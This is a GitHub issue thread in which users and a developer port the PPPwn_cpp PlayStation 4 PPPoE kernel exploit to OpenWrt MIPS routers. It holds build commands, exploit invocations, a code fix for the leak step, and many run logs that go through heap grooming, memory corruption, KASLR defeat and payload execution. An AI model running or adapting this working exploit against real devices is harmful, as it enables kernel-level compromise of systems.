tp-link archer c7 question

[kondratovicz]

Hi i have this router with openwrt installed Can you please provide an artifact for MIPS 74Kc architecture? If it is a lot to ask, provide a small guide how to compile your code for qualcomm atheros qca9563 please

system type     : Qualcomm Atheros QCA956X ver 1 rev 0
machine         : TP-Link Archer C7 v5
processor       : 0
cpu model       : MIPS 74Kc V5.0
BogoMIPS        : 385.84
wait instruction    : yes
microsecond timers  : yes
tlb_entries     : 32
extra interrupt vector  : yes
hardware watchpoint : yes, count: 4, address/irw mask: [0x0ffc, 0x0ffc, 0x0ffb, 0x0ffb]
isa         : mips1 mips2 mips32r1 mips32r2
ASEs implemented    : mips16 dsp dsp2
Options implemented : tlb 4kex 4k_cache prefetch mcheck ejtag llsc dc_aliases perf_cntr_intr_bit cdmm contextconfig perf mm_full
shadow register sets    : 1
kscratch registers  : 0
package         : 0
core            : 0
VCED exceptions     : not available
VCEI exceptions     : not available

[xfangfang]

@kondratovicz have you try the mipsel-linux-musl？

https://nightly.link/xfangfang/PPPwn_cpp/workflows/ci.yaml/main?status=completed

[kondratovicz]

@xfangfang

yes

/bin/pppwn: line 1: syntax error: unexpected word (expecting ")")

[xfangfang]

It's strange, I can actually use it under mips, I don't know why:

root@OpenWrt:~# cat /proc/cpuinfo
system type     : MediaTek MT7621 ver:1 eco:3
machine         : Xiaomi Mi Router 3 Pro
processor       : 0
cpu model       : MIPS 1004Kc V2.15
BogoMIPS        : 584.90
wait instruction    : yes
microsecond timers  : yes
tlb_entries     : 32
extra interrupt vector  : yes
hardware watchpoint : yes, count: 4, address/irw mask: [0x0ffc, 0x0ffc, 0x0ffb, 0x0ffb]
isa         : mips1 mips2 mips32r1 mips32r2
ASEs implemented    : mips16 dsp mt
Options implemented : tlb 4kex 4k_cache prefetch mcheck ejtag llsc pindexed_dcache userlocal vint perf_cntr_intr_bit cdmm perf
shadow register sets    : 1
kscratch registers  : 0
package         : 0
core            : 0
VPE         : 0
VCED exceptions     : not available
VCEI exceptions     : not available

[xfangfang]

@kondratovicz

You can try mips-linux-musl now. The program should be able to run, but I'm not sure if all the behavior is correct because I didn't fully consider supporting big endian systems when writing the code, so some of the data sent may be reversed.

https://github.com/xfangfang/PPPwn_cpp/actions/runs/9109224922

[kondratovicz]

root@OpenWrt:~# pppwn
[+] PPPwn++ - PlayStation 4 PPPoE RCE by theflow
SYNOPSIS
        pppwn --interface <interface> [--fw <fw>] [--stage1 <STAGE1>] [--stage2 <STAGE2>] [-a]
        pppwn list

OPTIONS
        --interface network interface
        --fw        {750,751,755,800,801,803,850,852,900,903,904,950,951,960,1000,1001,1050,1070,1071,1100}
        --stage1    stage1 binary
        --stage2    stage2 binary
        -a, --auto-retry
                    automatically retry when fails

        list        list interfaces

It worked. Thanks a lot!

[xfangfang]

You still need to run it with ps4 to test. If it runs successfully, it means there is no problem. If it keeps getting stuck at some stage, you can send the log here.

[Cyrgia]

@kondratovicz

You can try mips-linux-musl now. The program should be able to run, but I'm not sure if all the behavior is correct because I didn't fully consider supporting big endian systems when writing the code, so some of the data sent may be reversed.

https://github.com/xfangfang/PPPwn_cpp/actions/runs/9109224922

Hello, for me it launch but it doesn't pass heap grooming 0% i have an Archer C6 v2 with mips_24kc according to OpenWRT Techdata (https://openwrt.org/toh/hwdata/tp-link/tp-link_archer_c6_v2_eu)

Thanks for the work anyway

[kondratovicz]

root@OpenWrt:~# pppwn --interface eth0.1 --fw 1100 --stage1 "stage1.bin" --stage
2 "stage2.bin" --auto-retry
[+] PPPwn++ - PlayStation 4 PPPoE RCE by theflow
[+] args: interface=eth0.1 fw=1100 stage1=stage1.bin stage2=stage2.bin auto-retry=on

[+] STAGE 0: Initialization
[*] Waiting for PADI...
[*] Waiting for PADI...
[+] pppoe_softc: 0xd63c30e8c3ffff
[+] Target MAC: {targetmac}
[+] Source MAC: {sourcemac}
[+] AC cookie length: 4e0
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...
[*] Waiting for interface to be ready...
[+] Generate target IPv6 from MAC address
[+] Target IPv6: {targetipv6}
[*] Heap grooming...0%

Hello Same for my router

[xfangfang]

I need to write some tests to ensure that pppwn_cpp can also run normally on the big endian system.

Currently, everything related to numbers and bytes may not be correct under the big endian system.

[ekush]

For this one, I tried the following for a TP-Link TL-WR941HP v2 router.

Router

root@OpenWrt:~# uname -m
mips
root@OpenWrt:~# cat /proc/cpuinfo
system type     : Qualcomm Atheros TP9343 rev 0
machine         : TP-Link TL-WR941HP v2
processor       : 0
cpu model       : MIPS 74Kc V5.0
BogoMIPS        : 373.55
wait instruction    : yes
microsecond timers  : yes
tlb_entries     : 32
extra interrupt vector  : yes
hardware watchpoint : yes, count: 4, address/irw mask: [0x0ffc, 0x0ffc, 0x0ffb, 0x0ffb]
isa         : mips1 mips2 mips32r1 mips32r2
ASEs implemented    : mips16 dsp dsp2
Options implemented : tlb 4kex 4k_cache prefetch mcheck ejtag llsc dc_aliases perf_cntr_intr_bit cdmm contextconfig perf mm_full
shadow register sets    : 1
kscratch registers  : 0
package         : 0
core            : 0
VCED exceptions     : not available
VCEI exceptions     : not available

root@OpenWrt:~# 

I have cloned this repo (https://github.com/xfangfang/PPPwn_cpp), and run

cmake -B build -DCMAKE_BUILD_TYPE=MinSizeRel -DZIG_TARGET=mips-linux-musl -DUSE_SYSTEM_PCAP=OFF -DZIG_COMPILE_OPTION='-msoft-float'
cmake --build build -t pppwn
strip build/pppwn
upx --lzma build/pppwn 

Then transferred the pppwn file from the build folder to the router, and tried running it. from there. In this case the error disappeared and the process started, but it's stuck at [*] Heap grooming...0% for quite a while. Not sure if this is because of the tiny processor of the router or not.

Output from router:

---
[+] PPPwn++ - PlayStation 4 PPPoE RCE by theflow
[+] args: interface=br-lan fw=1100 stage1=/root/PPPwn_WRT-main/stage1_1100.bin stage2=/root/PPPwn_WRT-main/stage2_1100.bin auto-retry=on

[+] STAGE 0: Initialization
[*] Waiting for PADI...
[*] Waiting for PADI...
[+] pppoe_softc: 0x42241670d2ffff
[+] Target MAC: 2c:cc:44:a8:eb:8c
[+] Source MAC: 00:00:24:16:70:d3
[+] AC cookie length: 4e0
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...
[*] Waiting for interface to be ready...
[+] Generate target IPv6 from MAC address
[+] Target IPv6: fe80::2ecc:44ff:fea8:eb8c
[*] Heap grooming...0%

[xfangfang]

@ekush Sorry, the current version does not support big endian systems yet. There are some codes that need to be adjusted. But it will take some time to adapt.

If you are interested, please feel free to submit code modifications (some numbers need to be converted to the big end) or submit a traffic monitoring file in PCAP format.

Installing tcpdump on your router and running this command on your computer can be used to view real-time traffic:

ssh root@192.168.1.1 'tcpdump -i lan1  -s 0 -l -w -' | /Applications/Wireshark.app/Contents/MacOS/Wireshark -k -i -

[ekush]

Hi, I am trying to have a look at the source code. Meanwhile here is the traffic monitoring capture file

Thanks.

[xfangfang]

Just from the test, the data sent by the mips-linux-musl version is now consistent with others, but I am not sure if there are any errors in other parts of the code. https://github.com/xfangfang/PPPwn_cpp/commit/3c62b85efd7495a0fe975ba9e5a9e7144099f8be

If someone can use a real device to test and tell me it can run, I will merge it to the main branch.

https://github.com/xfangfang/PPPwn_cpp/actions/runs/9235075114

https://nightly.link/xfangfang/PPPwn_cpp/actions/runs/9235075114/mips-linux-musl.zip

[Cyrgia]

Hello i tried this one but now i got this error: root@OpenWrt:~# pppwn --interface br-lan --fw 1100 --stage1 "/etc/PPPwnWRT/stage1.bin" --stage2 "/etc/PPPwnWRT/stage2.bin" --auto-retry Bus error

"br-lan" is my interface name hope this help

[xfangfang]

@Cyrgia Could you try other interface? a specified one, like lan1

[Cyrgia]

i have only this interfaces on my router

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP qlen 1000 link/ether xx:xx:xx:xx:xx:xx brd ff:ff:ff:ff:ff:ff inet6 fe80::xxxx:xxxx:xxxx:xxxxx/64 scope link valid_lft forever preferred_lft forever 6: br-lan: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP qlen 1000 link/ether xx:xx:xx:xx:xx:xx brd ff:ff:ff:ff:ff:ff inet 192.168.1.5/24 brd 192.168.1.255 scope global br-lan valid_lft forever preferred_lft forever 7: eth0.1@eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-lan state UP qlen 1000 link/ether xx:xx:xx:xx:xx:xx brd ff:ff:ff:ff:ff:ff 8: phy1-ap0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-lan state UP qlen 1000 link/ether xx:xx:xx:xx:xx:xx brd ff:ff:ff:ff:ff:ff inet6 fe80::xxxx:xxxx:xxxx:xxxxx/64 scope link valid_lft forever preferred_lft forever 9: phy0-ap0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-lan state UP qlen 1000 link/ether xx:xx:xx:xx:xx:xx brd ff:ff:ff:ff:ff:ff inet6 fe80::xxxx:xxxx:xxxx:xxxxx/64 scope link valid_lft forever preferred_lft forever

[Cyrgia]

it was working before and i can go to Heap grooming 0% but now i got this Bus error

[xfangfang]

@Cyrgia This is the previous build, please try the previous build again. If it doesn't raise a bus error, then I will check the code.

https://nightly.link/xfangfang/PPPwn_cpp/actions/runs/9109224922/mips-linux-musl.zip

[Cyrgia]

sorry, the bus error was an error on my router, i reset it but it still block on heap grooming...0%, even with the new pppwn: root@OpenWrt:~# pppwn --interface br-lan --fw 1100 --stage1 "/etc/PPPwnWRT/stage1.bin" --stage2 "/etc/PPPwnWRT/stage2.bin" --auto-retry [+] PPPwn++ - PlayStation 4 PPPoE RCE by theflow [+] args: interface=br-lan fw=1100 stage1=/etc/PPPwnWRT/stage1.bin stage2=/etc/PPPwnWRT/stage2.bin timeout=0 wait-after-pin=1 groom-delay=4 auto-retry=on no-wait-padi=off real_sleep=off

[+] STAGE 0: Initialization [] Waiting for PADI... [] Waiting for PADI... [+] pppoe_softc: 0xxxxxxxxxxxxxxxxx [+] Target MAC: xx:xx:xx:xx:xx:xx [+] Source MAC: xx:xx:xx:xx:xx:xx [+] AC cookie length: 4e0 [] Sending PADO... [] Waiting for PADR... [] Sending PADS... [] Sending LCP configure request... [] Waiting for LCP configure ACK... [] Waiting for LCP configure request... [] Sending LCP configure ACK... [] Sending IPCP configure request... [] Waiting for IPCP configure ACK... [] Waiting for IPCP configure request... [] Sending IPCP configure NAK... [] Waiting for IPCP configure request... [] Sending IPCP configure ACK... [] Waiting for interface to be ready... [+] Generate target IPv6 from MAC address [+] Target IPv6: xxxxxxxxxxxxxxxxxxx [*] Heap grooming...0%

[xfangfang]

The mac address or ip address won't leak any information, can you send a complete log?

[Cyrgia]

root@OpenWrt:~# pppwn --interface br-lan --fw 1100 --stage1 "/etc/PPPwnWRT/stage1.bin" --stage2 "/etc/PPPwnWRT/stage2.bin" --auto-retry [+] PPPwn++ - PlayStation 4 PPPoE RCE by theflow [+] args: interface=br-lan fw=1100 stage1=/etc/PPPwnWRT/stage1.bin stage2=/etc/PPPwnWRT/stage2.bin timeout=0 wait-after-pin=1 groom-delay=4 auto-retry=on no-wait-padi=off real_sleep=off

[+] STAGE 0: Initialization [] Waiting for PADI... ^C[] Sending PADT... root@OpenWrt:~# pppwn --interface br-lan --fw 1100 --stage1 "/etc/PPPwnWRT/stage1.bin" --stage2 "/etc/PPPwnWRT/stage2.bin" --auto-retry [+] PPPwn++ - PlayStation 4 PPPoE RCE by theflow [+] args: interface=br-lan fw=1100 stage1=/etc/PPPwnWRT/stage1.bin stage2=/etc/PPPwnWRT/stage2.bin timeout=0 wait-after-pin=1 groom-delay=4 auto-retry=on no-wait-padi=off real_sleep=off

[+] STAGE 0: Initialization [] Waiting for PADI... [] Waiting for PADI... [+] pppoe_softc: 0xffffdb5b16c83a00 [+] Target MAC: 00:d9:d1:b9:7a:42 [+] Source MAC: 07:3a:c8:16:5b:db [+] AC cookie length: 4e0 [] Sending PADO... [] Waiting for PADR... [] Sending PADS... [] Sending LCP configure request... [] Waiting for LCP configure ACK... [] Waiting for LCP configure request... [] Sending LCP configure ACK... [] Sending IPCP configure request... [] Waiting for IPCP configure ACK... [] Waiting for IPCP configure request... [] Sending IPCP configure NAK... [] Waiting for IPCP configure request... [] Sending IPCP configure ACK... [] Waiting for interface to be ready... [+] Generate target IPv6 from MAC address [+] Target IPv6: fe80::2d9:d1ff:feb9:7a42 [*] Heap grooming...0%

[xfangfang]

It looks okay, it should be a minor issue, but I need to configure QEMU to debug it.

If you could monitor the traffic as mentioned here, it would be even better: https://github.com/xfangfang/PPPwn_cpp/issues/28#issuecomment-2128033406

[Cyrgia]

i can't install tcpdump... the c6 v2 is realy shitty about space... root@OpenWrt:~# opkg install tcpdump Installing tcpdump (4.99.4-1) to root... Collected errors:

• verify_pkg_installable: Only have 300kb available on filesystem /overlay, pkg tcpdump needs 312
• opkg_install_cmd: Cannot install package tcpdump. root@OpenWrt:~# df Filesystem 1K-blocks Used Available Use% Mounted on /dev/root 4352 4352 0 100% /rom tmpfs 61028 1036 59992 2% /tmp /dev/mtdblock5 1344 1044 300 78% /overlay overlayfs:/overlay 1344 1044 300 78% / tmpfs 512 0 512 0% /dev

Sorry

[nhanha78]

It looks okay, it should be a minor issue, but I need to configure QEMU to debug it.

If you could monitor the traffic as mentioned here, it would be even better: #28 (comment)

dump.zip

root@OpenWrt:~# cat /proc/cpuinfo system type : Atheros AR9330 rev 1 machine : D-Link DIR-505 processor : 0 cpu model : MIPS 24Kc V7.4

[Abdel31000]

It looks okay, it should be a minor issue, but I need to configure QEMU to debug it.

If you could monitor the traffic as mentioned here, it would be even better: #28 (comment)

@xfangfang I have a comtrend router with this Caractéristiques >> https://openwrt.org/toh/hwdata/comtrend/comtrend_ar-5387un << i have the same problem with the pppwn_mips file .. i have tried what you suggested and that's the result:

[3po3po]

[+] PPPwn++ - PlayStation 4 PPPoE RCE by theflow [+] args: interface=br-lan fw=1100 stage1=/root/PPPwn_WRT-main/stage1_1100.bin stage2=/root/PPPwn_WRT-main/stage2_1100.bin auto-retry=on

[+] STAGE 0: Initialization [] Waiting for PADI... [] Waiting for PADI... [+] pppoe_softc: 0xac890710afffff [+] Target MAC: 2c:cc:44:70:4c:6f [+] Source MAC: 00:00:89:07:10:b0 [+] AC cookie length: 4e0 [] Sending PADO... [] Waiting for PADR... [] Sending PADS... [] Sending LCP configure request... [] Waiting for LCP configure ACK... [] Waiting for LCP configure request... [] Sending LCP configure ACK... [] Sending IPCP configure request... [] Waiting for IPCP configure ACK... [] Waiting for IPCP configure request... [] Sending IPCP configure NAK... [] Waiting for IPCP configure request... [] Sending IPCP configure ACK... [] Waiting for interface to be ready... [+] Target IPv6: fe80::2ecc:44ff:fe70:4c6f [*] Heap grooming...0% Same here processor is Lantiq mips34k FritzBox 7320 OpenWrt 23.05 Unknown package 'tcpdump'. Collected errors:

• opkg_install_cmd: Cannot install package tcpdump.

[xfangfang]

@nhanha78 Thanks for the pcap dump

It seems to be a problem with CI. The content compiled on GitHub Action is different from my local build.

The code has been updated. Now I am sure that this is consistent with the content compiled locally.

https://github.com/xfangfang/PPPwn_cpp/actions/runs/9239059785

https://nightly.link/xfangfang/PPPwn_cpp/actions/runs/9239059785/mips-linux-musl.zip

[nhanha78]

Better results now. But....

[+] Heap grooming...done

[+] STAGE 1: Memory corruption [+] Pinning to CPU 0...done [] Sending malicious LCP configure request... [] Waiting for LCP configure reject... [] Sending LCP configure request... [] Waiting for LCP configure ACK... [] Waiting for LCP configure request... [] Sending LCP configure ACK... [] Sending IPCP configure request... [] Waiting for IPCP configure ACK... [] Waiting for IPCP configure request... [] Sending IPCP configure NAK... [] Waiting for IPCP configure request... [] Sending IPCP configure ACK... [-] Scanning for corrupted object...failed. [] Sending PADT... [] Retry after 5s...

Fail and back to Stage 0

[xfangfang]

@nhanha78 Try a few more times, even on other platforms, the success rate is not 100%

Or restart PS4 and try again. As long as it succeeds once, it indicates that the current implementation is good for big endian.

If you can successfully run on other platforms but cannot succeed on your router, you can send a complete PCAP dump again.

For openwrt, it may be necessary to use --real-sleep to speed up the running speed.

[nhanha78]

I managed to reach stage 2 once but the PS4 crashed. I´m running PS4 on firmware 9.00

[+] STAGE 1: Memory corruption [+] Pinning to CPU 0...done [] Sending malicious LCP configure request... [] Waiting for LCP configure reject... [] Sending LCP configure request... [] Waiting for LCP configure ACK... [] Waiting for LCP configure request... [] Sending LCP configure ACK... [] Sending IPCP configure request... [] Waiting for IPCP configure ACK... [] Waiting for IPCP configure request... [] Sending IPCP configure NAK... [] Waiting for IPCP configure request... [] Sending IPCP configure ACK... [+] Scanning for corrupted object...found fe80::0c87:4141:4141:4141

[+] STAGE 2: KASLR defeat

[] Defeating KASLR... [+] pppoe_softc_list: 0xf8995e8dffffffff [+] kaslr_offset: 0xf8995e8e7bc12607 [-] Error: Leak is invalid. Wrong firmware? [] Sending PADT... [*] Retry after 5s...

[xfangfang]

@nhanha78 Fix for pppoe_softc_list https://github.com/xfangfang/PPPwn_cpp/actions/runs/9240200265

[nhanha78]

I tested pppwn on an ubuntu x64 and it worked fine.

In OpenWRT it always gives the same error on stage 2 and crashes the PS4.

[+] STAGE 2: KASLR defeat

[] Defeating KASLR... [+] pppoe_softc_list: 0xf899ca9cffffffff [+] kaslr_offset: 0xf899ca9d7bc12607 [-] Error: Leak is invalid. Wrong firmware? [] Sending PADT... [*] Retry after 5s...

[xfangfang]

Have you used the latest build? In my previous reply, I modified the following code:

- self->pppoe_softc_list = *(uint64_t * )(option + 3);
+ self->pppoe_softc_list = htole64(*(uint64_t * )(option + 3)); 

But： log before：[+] pppoe_softc_list: 0xf8995e8dffffffff log now：[+] pppoe_softc_list: 0xf899ca9cffffffff

pppoe_softc_list should be like: 0xffffffff9cca99f8

As can be seen, htole64 has not had any effect, so I can't help but wonder if you haven't used the latest build mentioned in the previous comment

https://github.com/xfangfang/PPPwn_cpp/actions/runs/9240200265

https://nightly.link/xfangfang/PPPwn_cpp/actions/runs/9240200265/mips-linux-musl.zip

[nhanha78]

Sorry, I didn't see there was a new version.

The latest version reaches the end but it seems that it does not load the payload. Nothing happens on PS4.

[+] STAGE 4: Arbitrary payload execution [*] Sending stage2 payload... [+] Done!

[xfangfang]

Good news, but I need pcap dump to determine the cause.

[xfangfang]

I actually find a possible cause, but if there are any other issues, it's best to get a pcap dump.

hope this is the last mistake

https://github.com/xfangfang/PPPwn_cpp/actions/runs/9241007478

https://nightly.link/xfangfang/PPPwn_cpp/actions/runs/9241007478/mips-linux-musl.zip

[xfangfang]

Sorry another fix, hope this is the last mistake for the second time:

https://github.com/xfangfang/PPPwn_cpp/actions/runs/9241082782 https://nightly.link/xfangfang/PPPwn_cpp/actions/runs/9241082782/mips-linux-musl.zip

[ekush]

Sorry another fix, hope this is the last mistake for the second time:

https://github.com/xfangfang/PPPwn_cpp/actions/runs/9241082782 https://nightly.link/xfangfang/PPPwn_cpp/actions/runs/9241082782/mips-linux-musl.zip

Great progress! This one seems to run, terminal says done, however, goldhen doesn't load up. I am trying with a fresh setup, with the golhen bin in the usb (in case that matters).

Terminal:

[+] STAGE 2: KASLR defeat

[*] Defeating KASLR...
[+] pppoe_softc_list: 0xffffffffa142e578
[+] kaslr_offset: 0x1cf4c000

[+] STAGE 3: Remote code execution
[*] Sending LCP terminate request...
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffc72a38613400
[+] Target MAC: 2c:cc:44:a8:eb:8c
[+] Source MAC: 97:df:df:9f:ff:ff
[+] AC cookie length: 514
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Triggering code execution...
[*] Waiting for stage1 to resume...
[*] Sending PADT...
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffc72a3891ac00
[+] Target MAC: 2c:cc:44:a8:eb:8c
[+] AC cookie length: 0
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...

[+] STAGE 4: Arbitrary payload execution
[*] Sending stage2 payload...
[+] Done!

Here is the captured packets.

[xfangfang]

@ekush This captured PCAP file is stopped at stage 0, Can you provide a complete monitoring file? I mainly want to see the content of stage 4

[ekush]

Seems like is stops capturing after stage 0 for some reason. Let me reset the router and try again for a full capture.

[k3nnk3nn]

I’m experiencing the same issue as @ekush. Although the progress indicates it’s done, GoldHEN doesn't load up.

[3po3po]

RUN9241082782

I can confirm on fritz box 7320 CPU Lantiq AR9 @ 393 MHz - MIPS32 34Kc {3 RUNS} 1st run don exec hen {second infinite loop this happen also on windows sometimes} and 3rd run same as 1st

didn't seem to start automatically with ps4 boot Up

[+] STAGE 2: KASLR defeat

[*] Defeating KASLR... [+] pppoe_softc_list: 0xffffffff96b32578 [+] kaslr_offset: 0x12650000

[+] STAGE 3: Remote code execution [] Sending LCP terminate request... [] Waiting for PADI... [+] pppoe_softc: 0xffffad8744719000 [+] Target MAC: 2c:cc:44:70:4c:6f [+] Source MAC: 97:1f:50:95:ff:ff [+] AC cookie length: 514 [] Sending PADO... [] Waiting for PADR... [] Sending PADS... [] Triggering code execution... [] Waiting for stage1 to resume... [] Sending PADT... [] Waiting for PADI... [+] pppoe_softc: 0xffffad8744457a00 [+] Target MAC: 2c:cc:44:70:4c:6f [+] AC cookie length: 0 [] Sending PADO... [] Waiting for PADR... [] Sending PADS... [] Sending LCP configure request... [] Waiting for LCP configure ACK... [] Waiting for LCP configure request... [] Sending LCP configure ACK... [] Sending IPCP configure request... [] Waiting for IPCP configure ACK... [] Waiting for IPCP configure request... [] Sending IPCP configure NAK... [] Waiting for IPCP configure request... [] Sending IPCP configure ACK...

[+] STAGE 4: Arbitrary payload execution [*] Sending stage2 payload... [+] Done!

[ekush]

@xfangfang here is the latest capture.

[3po3po]

Sorry my mistake it autostart 10 from 10 RUNS

system type : AR9 rev 1.2 machine : AVM FRITZ!Box 7320 processor : 0 cpu model : MIPS 34Kc V4.12 BogoMIPS : 261.73 wait instruction : yes microsecond timers : yes tlb_entries : 16 extra interrupt vector : yes hardware watchpoint : yes, count: 4, address/irw mask: [0x0ffc, 0x0ffc, 0x0ffb, 0x0ffb] isa : mips1 mips2 mips32r1 mips32r2 ASEs implemented : mips16 dsp mt

1 RUN

[+] STAGE 4: Arbitrary payload execution [*] Sending stage2 payload... [+] Done!

2 min

2 RUN

Kernel panic [ERROR: /build/_deps/pcapplusplus-src/Pcap++/src/PcapLiveDevice.cpp: sendPacket:628] Error sending packet: send: No such device or address

1.5 min

3 RUN

[+] STAGE 4: Arbitrary payload execution [*] Sending stage2 payload... [+] Done!

4 min

Delayed KP on power off > clean scan > power off > ppwn > power on

4 RUN

[+] STAGE 4: Arbitrary payload execution [*] Sending stage2 payload... [+] Done!

2 min

5 RUN

[+] STAGE 4: Arbitrary payload execution [*] Sending stage2 payload... [+] Done!

2 min

Delayed KP on power off > clean scan > power off > ppwn > power on

6 RUN

[+] STAGE 4: Arbitrary payload execution [*] Sending stage2 payload... [+] Done!

1.5 min

7 RUN

[+] STAGE 4: Arbitrary payload execution [*] Sending stage2 payload... [+] Done!

2 min

8 RUN

[+] STAGE 4: Arbitrary payload execution [*] Sending stage2 payload... [+] Done!

2 min

Delayed KP on power off > clean scan > power off > ppwn > power on

9 RUN [+] STAGE 4: Arbitrary payload execution [*] Sending stage2 payload... [+] Done!

3 min

Delayed KP on power off > clean scan > power off > ppwn > power on

10 RUN

[+] STAGE 4: Arbitrary payload execution [*] Sending stage2 payload... [+] Done!

1 min

[xfangfang]

@xfangfang here is the latest capture.

Thank you, but this is not complete. This monitoring seems to have been repeatedly cracked several times, but it was manually terminated before reaching stage 4

[ekush]

@xfangfang I stopped monitoring after around a minute or so after seeing 'done' in the terminal. I'm not sure if the router is acting slow. Will try and capture again maybe.

[nhanha78]

Tcp Dump from latest release after stage 4 complete.

tcpdump_2024-05-26_1410.zip

[xfangfang]

@nhanha78 Thanks for the PCAP.

new update is here: Fix for UDP checksum

https://github.com/xfangfang/PPPwn_cpp/actions/runs/9245265144 https://nightly.link/xfangfang/PPPwn_cpp/actions/runs/9245265144/mips-linux-musl.zip

@Abdel31000

It doesn't work, it stuck at stage 1 :

This situation occurs from time to time, From https://github.com/TheOfficialFloW/PPPwn:

run it again ... and then click on Test Internet Connection on your PS4: always simultaneously.

[Abdel31000]

I’m experiencing the same issue as @ekush & @k3nnk3nn, The progress indicates it’s done, but GoldHEN doesn't load up.

[xfangfang]

@Abdel31000 Have you try the latest build: https://nightly.link/xfangfang/PPPwn_cpp/actions/runs/9245265144/mips-linux-musl.zip